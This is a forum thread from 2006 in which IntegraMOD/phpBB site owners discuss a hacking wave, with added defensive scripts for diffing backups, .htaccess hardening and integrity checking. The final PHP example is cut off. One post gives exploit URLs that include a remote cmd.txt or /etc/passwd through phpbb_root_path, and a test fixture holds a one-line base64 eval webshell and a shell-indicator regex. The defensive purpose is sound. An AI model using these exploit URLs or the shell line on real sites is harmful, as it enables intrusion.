I am keeping my site offline until a fix for this hack has been proven. If any further information can potentially be gleaned from reviewing my backup archives, please advise of what to look for.
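Dr. Bantham's observation that jtvewvwu.php was absent from the 7/30 backup but already present in the 8/12 one is the right method: compare file content, not directory listings or dates, between a known-good backup and each later snapshot, and do not skip cache directories. The Python script below is an added example, not part of the post or of phpBB Backup Suite; the two trees it builds are constructed, and the list of function names it treats as shell indicators (`eval`, `base64_decode`, `gzinflate` and so on) is an assumption, not a complete signature. It hashes every file, so a forged modification time cannot hide a change, and it reports every added or modified file even when no indicator fires, because a new image in an avatar directory can still be a renamed script.

```python
"""Compare a known-good backup of a forum tree with a later snapshot, list every
added or modified file by content hash, and grade each one for webshell
indicators. Added example, not IntegraMod or phpBB Backup Suite code; both
trees below are constructed."""
import hashlib
import os
import re
import tempfile

# Functions a dropped PHP shell almost always calls; an assumption, not a
# complete signature list.
SHELL_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|passthru|shell_exec|system|exec|popen|assert)\s*\(",
    re.I,
)

# Constructed baseline (the older backup) and current snapshot.
BASELINE = {
    "index.php": "<?php\ndefine('IN_PHPBB', true);\ninclude('common.php');\n",
    "includes/functions.php": "<?php\nfunction init_userprefs() {}\n",
    "var_cache/blocks.php": "<?php\nreturn array('blocks' => 3);\n",
    "config.php": "<?php\n$dbpasswd = 'secret';\n",
}
CURRENT = dict(BASELINE)
CURRENT["index.php"] += "eval(gzinflate(base64_decode('placeholder')));\n"  # injected line
CURRENT["var_cache/jtvewvwu.php"] = "<?php\neval(base64_decode($_POST['x']));\n"  # dropped shell
CURRENT["images/avatars/upload/new.gif"] = "GIF89a\x00\x01"  # benign new upload


def write_tree(files):
    """Materialise a {relative path: content} mapping under a temp directory."""
    root = tempfile.mkdtemp(prefix="im_triage_")
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def hash_tree(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return digests


def diff_trees(base_root, cur_root):
    """Return sorted (added, modified, removed) relative paths by content."""
    base, cur = hash_tree(base_root), hash_tree(cur_root)
    added = sorted(set(cur) - set(base))
    removed = sorted(set(base) - set(cur))
    modified = sorted(p for p in set(base) & set(cur) if base[p] != cur[p])
    return added, modified, removed


def shell_indicators(text):
    """Distinct shell-indicator function names found in text, in order."""
    found = []
    for name in SHELL_RE.findall(text):
        name = name.lower()
        if name not in found:
            found.append(name)
    return found


def triage(base_root, cur_root):
    """List (status, path, indicators) for every added or modified file."""
    added, modified, _removed = diff_trees(base_root, cur_root)
    report = []
    for status, paths in (("added", added), ("modified", modified)):
        for rel in paths:
            with open(os.path.join(cur_root, rel), encoding="utf-8", errors="replace") as fh:
                report.append((status, rel, shell_indicators(fh.read())))
    return report


if __name__ == "__main__":
    base_dir, cur_dir = write_tree(BASELINE), write_tree(CURRENT)
    for status, rel, indicators in triage(base_dir, cur_dir):
        flag = " <-- " + ", ".join(indicators) if indicators else ""
        print(f"{status:9} {rel}{flag}")
```

Run it once per backup in the series (7/30 against 8/12, 8/12 against 8/25, and so on) to narrow the window in which each file first appeared, then pull the access log for that window and look for the request that created it. Removed files matter too: the thread mentions trashed copies of common.php and config.php, and a file that vanishes between snapshots is as telling as one that appears.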

PostPosted: Sun Aug 27, 2006 5:54 am
Author: Unregistered
Dr. Bantham, I just took my live site offline as well.. am waiting for a patch as well

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 6:42 am
Author: florida4x4
Folks, I got hacked too. I found the hacker was using the phpbb_root_path to execute a script on a remote server. Turning off register_globals in php.ini stopped the script from executing. Not sure if that is a total fix but my site remains online and I am waiting with a big stick for the next attempt...

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 7:48 am
Author: Dioncecht
WARNING!!!

Do not under ANY circumstances give this guy alemci_2784@hotmail.com the URL to your site.. That is our pal the Turk... I had a brief chat with him on MSN Messenger. He was trying like hell to get the URL to my site, but I blocked and deleted him.

PostPosted: Sun Aug 27, 2006 8:08 am
Author: Unregistered
Don't you think your signature gives him the answer?

PostPosted: Sun Aug 27, 2006 9:14 am
Author: Unregistered
God bless KisMod, hehe, I've just been hacked..

PostPosted: Sun Aug 27, 2006 9:22 am
Author: honie
Whoever got me, got me bad. I came home from work with a letter from my host that -

Your site has been suspended due to a hacked file that is phishing for Bank of America customer information.

I contacted them but cant get them on the phone and they havent answered by email yet. I have no clue what to do next. I think I will have to either just let the site go or hire someone to get it fixed.

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 9:34 am
Author: Solomon
"evolver";p="14199" wrote:
"evolver";p="14165" wrote:Euhm, how many of these hacked sites have a link on integraMOD2.com...
...or maybe even still on integraMOD.com ??

No need for Google to find these...
No need for 'Powered by' keywords to find these...

There are easier ways to find integraMOD sites than just by using Google...
And of course, that could also be a very good reason why integraMOD.com hasn't been hacked yet...

Just don't focus at one direction only...
Think about every possibility, because that's how hackers think as well...

Also, think about the Referers at the homepage...
That can also open a window of opportunity to hackers.

And as a precaution...
Maybe there should be a separate rescue-site for integramod.com.
Just a safe non-integramod site where all users can go for help and information if integraMOD2.com itself would be taken out...
Then nobody has to stay in the dark if something bad happens...

If not all disasters can be avoided, there should always be a disaster-plan ready...

I still don't understand why this site has survived and all of ours have not. Obviously integramod.com has something right. Care to share the secret?

"Painface";p="14200" wrote:The fix in the beginning of this thread should be enough to stop this hack...

Negative, it is not, nor are any of the suggested fixes so far. I was hacked 4 times in 3 days. It was like every time I did a newly suggested fix they countered by re-hacking and thus proving otherwise.

"florida4x4";p="14211" wrote:Folks, I got hacked too. I found the hacker was using the phpbb_root_path to execute a script on a remote server. Turning off register_globals in php.ini stopped the script from executing. Not sure if that is a total fix but my site remains online and I am waiting with a big stick for the next attempt...

This one I have not tried but this is why I suggested the topic of this thread be changed.
"Solomon";p="14198" wrote:The topic should be changed from "IntegraMod Hack fix" to "IntegraMod Hack discussion" to lessen confusion until a solid fix is available.

<img> Until a solid fix is available I've decided to CHMOD: 600 my "forum" directory and enable some .htaccess redirects to display a photo of a USA flag. Every time they do a search for "Powered by IntegraMOD" or "Powered by KisMod" and attempt to hit my site again, they can stare at my flag instead of me staring at theirs. My host is also monitoring for suspicious activity.
:grin:

PostPosted: Sun Aug 27, 2006 9:46 am
Author: Unregistered
am sure they are working on it.. please be patient.. <img>

PostPosted: Sun Aug 27, 2006 10:00 am
Author: Master Dwarf
I emailed my host to let them know what's going on and setup a livejournal account as a status page for my site. I tried to mass email my users but get an error 'hacking attempt' which may or may not be attributed to a file I had to change above.

We'll see what happens. Right now I'm flying under the radar.

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 10:17 am
Author: Vadar
Edited to remove link. PM me if you would like it sent to you.

I've got a 1.40, 1.4.1Beta2 and a 1.4.1Beta3 running and haven't been hit (yet), but have been probed from at least 4 Turkish IPs in the past 24 hours. Made the primary recommended patch for all three, and all of the recommended changes listed here for the 1.4.0 site. Decided to not do some of the mods listed here for the other two sites since I don't really need them and they would be good test beds.

I checked my magic_quotes_gpc setting after reading the link above and found I've never had it on for any of my sites. For those who have been hit, was this set to "On" when you got hit? I've since changed that setting to "On" for all three forums.

For now I'm just watching my HTTP Referers and banning IPs that are using the search wording discussed above. I know that won't do much, but it does make me feel better.... <img>

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 11:17 am
Author: Michaelo
From all your PMs and other information I have obtained, the main hack is definitely using the functions_portal.php vulnerability... This is fixed in the first post of this thread. The missing $phpbb_root_path = "./"; statement allows hackers to execute a remote script. Note once they have gained access they then use several methods to mess up your forum, each having different effects.

Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passthru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 11:24 am
Author: IntegraMOD
My phpbb_security.php file was also hacked. I have replaced it with a fresh one with what I think are the right settings; now when I access my forum all I get is the following


Fatal error: Call to undefined function: phpbbsecurity_guests() in /home/fhlinux184/a/abcunited.co.uk/user/htdocs/integra140/common.php on line 397

any help please.

site that was hacked http://www.abcunited.co.uk

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 11:27 am
Author: Unregistered
Vadar thanks for the link.. now I see the methods..

EXAMPLE -> http://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00 <- mq off


from what I see, they are using the INCLUDES folder to plant the bug..

now I just uploaded a .htaccess file to my test site's INCLUDES folder with a directory password.. the site works fine so far.. can anyone apply this and see whether it works?

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 11:36 am
Author: Master Dwarf
"Michaelo";p="14229" wrote:Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passthru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike


Forgive my ignorance, I can see under my php info that register globals is on, where would you turn it off in the admin panel or is this server/hosting side?

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 11:40 am
Author: Solomon
"Master Dwarf";p="14232" wrote:
"Michaelo";p="14229" wrote:Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passthru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike


Forgive my ignorance, I can see under my php info that register globals is on, where would you turn it off in the admin panel or is this server/hosting side?

Yes, could you please explain this a little further. We appreciate your help Mike.

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 12:09 pm
Author: evolver
I have searched a little further on the internet...
...looking for advice on securing PHP programming.

Read this:
http://www.zend.com/zend/art/art-oertli.php

I think it says a lot about the way hacks could happen and also shows the way to avoid it in PHP scripting...
And everything in that article seems to be much about what we are dealing with...

About protecting download-directories
Read this:
http://www.zend.com/zend/trick/tricks-august-2001.php

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 12:50 pm
Author: evolver
"Solomon";p="14233" wrote:
"Master Dwarf";p="14232" wrote:
"Michaelo";p="14229" wrote:Two other setting changes will stop this and other hacks from working i.e.

In your php.ini file set register_globals off and disable the passthru function.

Note setting register_globals off may stop some mods from functioning but hopefully this is only a temporary measure.
Mike


Forgive my ignorance, I can see under my php info that register globals is on, where would you turn it off in the admin panel or is this server/hosting side?

Yes could you please explain this alittle further. We appreciate your help Mike.

If you read the first article in my previous posting, you will find this about turning the configuration directive register_globals off:
"Zend Technologies" wrote:I am glad I did not have much time to write this article in early December 2001, because in the meantime Andi and Zeev added some very useful arrays in PHP v4.1.0: $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV and $_SESSION. These variables deprecate the old $HTTP_*_VARS arrays and can be used regardless of the scope. There is no need to import them using the global statement within functions.

Do yourself a favour and turn the configuration directive register_globals off. This will cause your GET, POST, Cookie, Server, Environment and Session variables not to be in the global scope anymore. Of course, this requires you to change your coding practice a little. But it is definitely a good thing to know where your variables come from. It will help you prevent security holes described in chapter 2.2.


register_globals
http://be2.php.net/manual/nl/faq.misc.p ... terglobals

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 1:21 pm
Author: Master Dwarf
I see. 8)

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 1:37 pm
Author: evolver
"Master Dwarf";p="14239" wrote:I see. 8)

I'm just putting everything I can find on this matter in this thread...
I just hope someone can tell us how to implement it...

Changing the register_globals, that's in php.ini as Michaelo said...
But not everyone can do that, only the server host can, and some just won't allow it because it will affect every other site on their server as well...
Then the emulator can be a solution, but I don't know exactly how and where to put it either...
I can just guess it would be in common.php...
(I'm not an expert, just a beginner)

I'm looking further to find any information that can help to beat this...

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 1:52 pm
Author: Unregistered
if you want to know whether your register_globals is on or off you can view it from admin panel -> tools -> PHP Info

and do a search (or CTRL+F) for "register_globals"

it will show your Local Value and Master Value of your PHP Info

now I've just spoken to my hosting company and asked them to turn it off.. now from my PHP Info I see
register_globals Local Value OFF and Master Value ON

earlier both values were ON..

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 2:01 pm
Author: Master Dwarf
"evolver";p="14242" wrote:Changing the register_globals, that's in php.ini as Michaelo said...
But not everyone can do that, only the server host can, and some just won't allow it because it will affect every other site on their server as well...
Then the emulator can be a solution, but I don't know exactly how and where to put it either...
I can just guess it would be in common.php...
(I'm not an expert, just a beginner)

I'm looking further to find any information that can help to beat this...


Ok, this helps. Thanks.

it will show your Local Value and Master Value of your PHP Info

I take it local value pertains to your site only and Master Value is server-wide. hmmm...will setting local to off help? Maybe thats the way to go for me right now.

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 2:22 pm
Author: Michaelo
While some of you may have access to php.ini, the majority will have to contact your hosts and request the changes. Note this should be temporary.

See these links for how to do this...
[url=http]Link 1[/url]
[url=http]Link 2[/url]
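Where the host will not touch php.ini, an added example (not from this thread and not part of IntegraMOD) of the same settings applied per directory. It assumes Apache 2.x running PHP as mod_php with AllowOverride permitting these directives, and that nothing under includes/ is meant to be requested by a browser; both are assumptions to check on your own host. Two of Michaelo's recommendations cannot be done this way: disable_functions (for passthru) and, from PHP 4.3.4 on, allow_url_fopen are php.ini-level settings, so those still need the host.

```apache
# Added example, not part of IntegraMOD. Two separate files.

# --- forum/.htaccess (top directory of the IntegraMOD install) -----------
# Turn register_globals off for this tree only, so the other sites on a
# shared host are unaffected. Needs mod_php; if PHP runs as CGI/FastCGI
# these lines cause a 500 error and a php.ini in this directory is the
# equivalent instead.
php_flag register_globals off
# Asked about above: "on" blocks the %00 truncation used in the second
# exploit URL, but it is a stopgap, not input validation.
php_flag magic_quotes_gpc on

# --- forum/includes/.htaccess -------------------------------------------
# Library files are included by index.php and friends, never requested
# directly. Refusing direct requests turns
#   includes/functions_portal.php?phpbb_root_path=...
# into a 403 before PHP runs, whatever register_globals is set to.
# Assumption: no script under includes/ is meant to be opened by a browser.
<Files "*.php">
    Order allow,deny
    Deny from all
</Files>
```

After uploading, confirm the first part took effect in admin panel -> tools -> PHP Info (Local Value should now read Off) and the second by requesting includes/functions_portal.php directly, which should return 403.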

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 2:33 pm
Author: evolver
Also this is interesting:
http://forum.mamboserver.com/showthread.php?t=26067

It's not about integraMOD, I know... :P
PHP-issues are no different on other CMS-scripts, so we can learn from that as well...

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 2:41 pm
Author: Michaelo
The register_globals emulator:

This should be the code; it is in common.php (or should be)
Code: Select all
if (@ini_get('register_globals') == '1' || strtolower(@ini_get('register_globals')) == 'on')
{
    // PHP4+ path
    $not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS', 'HTTP_SESSION_VARS', 'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');

    // Not only will array_merge give a warning if a parameter
    // is not an array, it will actually fail. So we check if
    // HTTP_SESSION_VARS has been initialised.
    if (!isset($HTTP_SESSION_VARS) || !is_array($HTTP_SESSION_VARS))
    {
        $HTTP_SESSION_VARS = array();
    }

    // Merge all into one extremely huge array; unset
    // this later
    $input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_SESSION_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES);

    unset($input['input']);
    unset($input['not_unset']);

    while (list($var,) = @each($input))
    {
        if (in_array($var, $not_unset))
        {
            die('Hacking attempt!');
        }
        unset($$var);
    }

    unset($input);
}


Check your version and let me know if common.php contains the above code.
Mike

PostPosted: Sun Aug 27, 2006 3:02 pm
Author: Dioncecht
"Unregistered";p="14213" wrote:dont you think ur signature gives his answer?


Yeah but I'm not going to hand it to him. If he wants it he can look for it. Besides he's tried to hack my site a few more times unsuccessfully in the last few hours. It looks like Michaelos patch is working.

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 3:27 pm
Author: evolver
"Michaelo";p="14248" wrote:The register_globals emulator:

This should be the code; it is in common.php (or should be)
Code: Select all
if (@ini_get('register_globals') == '1' || strtolower(@ini_get('register_globals')) == 'on')
{
    // PHP4+ path
    $not_unset = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS', 'HTTP_SESSION_VARS', 'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'phpEx', 'phpbb_root_path');

    // Not only will array_merge give a warning if a parameter
    // is not an array, it will actually fail. So we check if
    // HTTP_SESSION_VARS has been initialised.
    if (!isset($HTTP_SESSION_VARS) || !is_array($HTTP_SESSION_VARS))
    {
        $HTTP_SESSION_VARS = array();
    }

    // Merge all into one extremely huge array; unset
    // this later
    $input = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_SESSION_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES);

    unset($input['input']);
    unset($input['not_unset']);

    while (list($var,) = @each($input))
    {
        if (in_array($var, $not_unset))
        {
            die('Hacking attempt!');
        }
        unset($$var);
    }

    unset($input);
}


Check your version and let me know if common.php contains the above code.
Mike

Yes, that code is there all right...
On both versions 1.4.0 and 1.4.1.

But if that is a "register_globals off" emulator, maybe it needs further improvement to exclude any form of abuse...

PostPosted: Sun Aug 27, 2006 3:29 pm
Author: jwernerny
I'm pretty sure it is not a hack on IM, simply a compromised host. C99 Shell can copy a file from anywhere on a system to any writable directory on the system. It doesn't have to come through IM or anything in your account for you to get it.

There are two solutions to this. The first one is obfuscation of the normally writable directories. The second is to have a good pre-emptive system installed in IM that looks for unknown files and quarantines them. It can be set to run every few minutes or each time the site is backed up.

Also see my response here: http://integramod.com/forum/viewtopic.php?p=14252#14252

- John
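As an added example, not IntegraMOD code and not the quarantine feature John proposes: a plain file-integrity check of the kind that would have shown the dropped shell or the replaced index.php in the reports above. Take a manifest of the clean upload, keep it outside the web root, and diff it against a fresh one on a schedule. Function names are mine; the demonstration at the bottom builds a constructed tree in the temp directory, so it runs stand-alone with `php` (5.2.1 or later for `sys_get_temp_dir()`).

```php
<?php
// Added example, not IntegraMOD code. Minimal file-integrity check.

// Recursively hash every file under $dir; keys are paths relative to $base.
function walk_files($dir, $base, &$out)
{
    $dh = opendir($dir);
    if ($dh === false) {
        return;
    }
    while (($name = readdir($dh)) !== false) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        $path = $dir . '/' . $name;
        if (is_dir($path)) {
            walk_files($path, $base, $out);
        } else {
            $out[substr($path, strlen($base) + 1)] = sha1_file($path);
        }
    }
    closedir($dh);
}

// array(relative path => sha1) for the whole tree, sorted for stable diffs.
function build_manifest($root)
{
    $root = rtrim($root, '/');
    $manifest = array();
    walk_files($root, $root, $manifest);
    ksort($manifest);
    return $manifest;
}

// Compare the stored manifest with the current tree. A dropped shell shows
// up as "added", a defaced index.php as "modified".
function diff_manifest($known, $current)
{
    $modified = array();
    foreach (array_intersect_key($known, $current) as $path => $hash) {
        if ($current[$path] !== $hash) {
            $modified[] = $path;
        }
    }
    return array(
        'added'    => array_keys(array_diff_key($current, $known)),
        'modified' => $modified,
        'removed'  => array_keys(array_diff_key($known, $current)),
    );
}

// --- Demonstration on a constructed tree in the temp directory -----------
$root = sys_get_temp_dir() . '/im_integrity_' . getmypid();
mkdir($root);
mkdir($root . '/includes');
file_put_contents($root . '/index.php', "<?php // clean index\n");
file_put_contents($root . '/includes/functions_portal.php', "<?php // clean\n");
$known = build_manifest($root);   // in practice: serialize() this to a file outside the web root

// Simulate the compromise described in the thread: defaced index, dropped shell.
file_put_contents($root . '/index.php', "<?php // defaced\n");
file_put_contents($root . '/includes/c99.php', "<?php // web shell\n");

$report = diff_manifest($known, build_manifest($root));
foreach ($report as $kind => $paths) {
    printf("%-9s %s\n", $kind . ':', $paths ? implode(', ', $paths) : '(none)');
}

// Remove the constructed tree again.
foreach (array_keys(build_manifest($root)) as $rel) {
    unlink($root . '/' . $rel);
}
rmdir($root . '/includes');
rmdir($root);
```

Run it from cron against the real forum directory with the manifest stored and compared instead of rebuilt; anything under "added" that is not an avatar, attachment or upload you recognise is worth opening before it is deleted, since it tells you how the attacker got in.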

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 3:31 pm
Author: Master Dwarf
"Michaelo";p="14248" wrote:Check you version and let me know it common.php contains the above code.
Mike


Hey Mike, the code is indeed located in common.php. I am running:
IM v1.4.0-with all patches and fixes applied using premodded files and no mods.
phpBB v2.0.21

Hope this helps.

oops, see evolver beat me to it. <img>

Re: IntegraMod (version 1) Hack fix

PostPosted: Sun Aug 27, 2006 3:58 pm
Author: Unregistered
"Michaelo";p="14133" wrote:You could also try this... Find any occurrence of
Code: Select all
if(isset($HTTP_POST_VARS['STYLE_URL']) || isset($HTTP_GET_VARS['STYLE_URL']))

replace with

Code: Select all
if(isset($HTTP_POST_VARS['STYLE_URL']) || (int) isset($HTTP_GET_VARS['STYLE_URL']))

And

Code: Select all
$style = urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : $HTTP_GET_VARS['STYLE_URL']);

with

Code: Select all
// the cast goes on the value being assigned; it cannot be applied to the assignment target
$style = (int) urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : (int) $HTTP_GET_VARS['STYLE_URL']);




Which file?

PostPosted: Sun Aug 27, 2006 4:07 pm
Author: evolver
"jwernerny";p="14254" wrote:I'm pretty sure it is not a hack on IM, simply a compromised host. C99 Shell can copy a file from anywhere on a system to any writable directory on the system. It doesn't have to come through IM or anything in your account for you to get it.

Your ideas might have some truth in it...
But then I believe that it is just one of the possible methods used for hacking...

If that what you say would be the only way they use to hack IM, then it would also affect every other php-site and not only integraMOD...
So the question you should then ask is:
Are all php-sites (so not only IM) having that many hacking attempts at this time?
Where does it all start?
Is a vulnerability in integraMOD causing access to hackers on all other sites as well? Then we would have an even bigger problem on our hands!!!
"jwernerny";p="14254" wrote:The second is to have a good pre-emptive system installed in IM that looks for unknown files and quarantines them. It can be set to run every few minutes or each time the site is backed up.

And how about newly uploaded avatars, downloads, attachments, photos,...
All being quarantined??

PostPosted: Sun Aug 27, 2006 4:12 pm
Author: billmcelligott
I am a bit concerned that about one minute after making the changes suggested here my index file was replaced with that Turkish thing mentioned earlier.

is someone having a gag here ?

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 4:21 pm
Author: jwernerny
There seems to be a good deal of information on the C99 Shell out there. I remember first finding it on my site a few months ago. I eradicated it and posted a note about it. It looks like it is becoming more common on many machines now. I found a vBulletin site that talks about it. http://forum.mamboserver.com/showthread.php?p=387492 It's got some really good ideas about how to secure things a bit more. (Anyone know if these can be slipped into config.php?)

The C99 Shell in action.... http://www.youtube.com/watch?v=HLw2lY1G3F8&mode=related&search=

PostPosted: Sun Aug 27, 2006 4:26 pm
Author: Michaelo
Unregistered, just a little type casting to ensure only int can be returned from GET in blocks_imp_style_select.php
Mike

PostPosted: Sun Aug 27, 2006 4:32 pm
Author: evolver
"billmcelligott";p="14259" wrote:I am a bit concerned that about one minute after making the changes suggested here my index file was replaced with that turkish thing mentioned earlier.

is someone having a gag here ?

I have an important question for you:
Did you come to integraMOD2.com by a link on your site to read about this suggested change?

If so, then this is my suggestion to everyone:
Avoid visiting integraMOD by referral from your site!!!!
Because then it seems clear to me that these hackers are taking advantage of the referrals to find your site!!!

I already mentioned that it was a possibility, now it seems to be fact...

PostPosted: Sun Aug 27, 2006 4:36 pm
Author: Unregistered
thanks mike..

PostPosted: Sun Aug 27, 2006 4:47 pm
Author: Unregistered
btw, fubie's site hacked as well..

now don't you think they can replace the RC3 Zip with an infected version?

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 5:26 pm
Author: Unregistered
IntegraMOD Cross-Site Scripting and File Inclusion Vulnerabilities

Description:
Some vulnerabilities have been discovered in IntegraMOD, which can be exploited by malicious people to conduct cross-site scripting attacks and to compromise a vulnerable system.

1) Input passed to the "STYLE_URL" parameter in index.php isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2) Input passed to the "phpbb_root_path" parameter in includes/functions_portal.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation of #2 requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 1.4.0. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised and verified.

Read more - http://secunia.com/advisories/20528/

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 6:06 pm
Author: evolver
"Unregistered";p="14268" wrote:1) Input passed to the "STYLE_URL" parameter in index.php isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised and verified.

OK now, please help me with this...
I'm just trying to use the info I gathered to point a fix to this...
But I'm not an expert on these things...
I was hoping someone with more skills would do it...

This is the code for the STYLE_URL:
In includes/functions.php:
Code: Select all
    // BEGIN Style Select MOD
    if ( isset($HTTP_POST_VARS[STYLE_URL]) || isset($HTTP_GET_VARS[STYLE_URL]) )
    {
        $style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] : $HTTP_GET_VARS[STYLE_URL] );
        if ( $theme = setup_style($style) )
        {
            setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);
            return;
        }
    }
And according to this site:
http://www.zend.com/zend/art/art-oertli.php

Code: Select all
    $id = (int)$HTTP_GET_VARS['id'];

or

Code: Select all
    $id = (int)$_GET['id'];           /* (PHP => v4.1.0) */

Now you can be sure $id contains an integer. If somebody tried to modify your SQL query by passing a string, the value would simply be 0. Checking strings is a little more difficult. In my opinion, the only professional way to do this is by using regular expressions. I know that many of you try to avoid them but -- believe me -- they are great fun once you got the basic idea. As an example, the variable $i from chapter 2.1. can be verified with this expression:
This script will only continue when the $id variable contains a file name starting with some lowercase alphabetic characters and ending with a .html extension. I will not go into regular expression details but I strongly recommend you the book "Mastering Regular Expressions" by Jeffrey E. F. Friedl (O'Reilly).


integer or string?
What do we do with $HTTP_GET_VARS[STYLE_URL] ???
Change them to (int)$HTTP_GET_VARS[STYLE_URL]

or use ereg??

I don't even know what variables are used... $HTTP_GET_VARS[STYLE_URL]
in there as well...

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 6:32 pm
Author: evolver
"Unregistered";p="14268" wrote:2) Input passed to the "phpbb_root_path" parameter in includes/functions_portal.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation of #2 requires that "register_globals" is enabled.

More about [url=http]Coding PHP with register_globals Off[/url]

...(http://www.php.net/manual/en/function.import-request-variables.php) or reviewing some of the reader posted comments related to the extract() function (http://www.php.net/manual/en/function.extract.php).

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 7:07 pm
Author: Solomon
"jwernerny";p="14260" wrote:The C99 Shell in action.... http://www.youtube.com/watch?v=HLw2lY1G3F8&mode=related&search=

Nice video find. I like how they boast "in under 3 mins", which is funny because usually it takes less than 2 mins to restore the site back to normal. So what's the point? If they want a forum to dish out their political lingo why don't they just register on my site and utilize my "Politics" forum section. God knows no one else does. <img>

[url=http]A Present for our Turkish Fanboys[/url]

PostPosted: Sun Aug 27, 2006 7:57 pm
Author: gcomfx.com
So am I the only one they've hacked whose homepage they haven't altered to "mark their hack"??

I was shut down by my host, apparently they were using my account to send out 4,500+ emails.

I found multiple files added to my integramod, and have updated all code added here as well. I also shut down my forum until we get a handle on this. <img>

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 8:56 pm
Author: Michaelo
The $HTTP_GET_VARS[STYLE_URL] should return an integer; this is why I added the (int) $HTTP_GET_VARS[STYLE_URL] type cast in a previous suggestion... In theory if someone tried to set the STYLE_URL to a string value (required by the hackers) the value should be truncated to 0 (zero)...

The way they did this is to call functions.php appending STYLE_URL = 'some script path etc.'... Because I am not in a position to test some of the crack fixes (I don't have an active site using 1.4.0) I have suggested removing the STYLE_URL variable and the associated code... I expect everyone to remove it until I can set up some method of testing...

These are the two main hacks accounting for 99% of the problems....

If you have been hacked: Remove all files, upload from your original source and make the edits from first post and remove the style select block and the code. Also remove the style select code from functions.php.

Don't forget to use a different password for the main admin and all other admins and moderators just in case these have been compromised... and finally don't forget to check your site for unwanted files.

Mike
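As an added example (not IntegraMOD's code and not Michaelo's patch, which is the `(int)` cast discussed above), here is what the Style Select block's input handling looks like once STYLE_URL can only ever be a positive integer theme id. `$HTTP_GET_VARS`, `$HTTP_POST_VARS`, `$board_config` and `setup_style()` are the names from the thread; `style_id_from_request()` is mine, and `setup_style()` is replaced by a three-theme stand-in so the file runs by itself from the command line.

```php
<?php
// Added example, not IntegraMOD code: Style Select input handling with
// STYLE_URL reduced to a positive integer before anything uses it.

// Returns the theme id as an int, or 0 when no usable value was sent.
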